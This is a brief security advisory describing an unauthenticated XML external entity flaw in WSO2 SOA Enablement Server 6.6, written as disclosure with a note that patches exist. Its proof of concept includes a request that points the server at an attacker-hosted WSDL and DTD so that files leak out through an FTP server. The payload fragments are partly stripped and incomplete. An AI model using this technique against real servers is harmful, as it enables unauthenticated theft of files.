Title: WSO2 SOA Enablement Server - XML External Entity Injection Authors: Pawel Gocyla, Jakub Palaczynski Date: 08. June 2016 Affected Software: ================== WSO2 SOA Enablement Server for Java/6.6 build SSJ-6.6-20090827-1616 Probably other versions are also vulnerable. Vulnerability: ************** XML External Entity Injection: ============================== It must be noted that this vulnerability is exploitable without authentication. Proof of Concept: 1. An attacker sets up web server that serves two files (wsdl.txt and file.dtd): wsdl.txt: %remote;%int;%trick;]> file.dtd: "> 2. An attacker sets up FTP server that logs every command executed on the server. 3. An attacker sends request that triggers vulnerability: https://WSO2SOA_IP:6443/invocationConsole?p.wsdlUrl=http://attacker_ip/wsdl.txt FIX: ==== Patches were already released by the vendor. Contact: ======== pawellgocyla[at]gmail[dot]com jakub.palaczynski[at]gmail[dot]com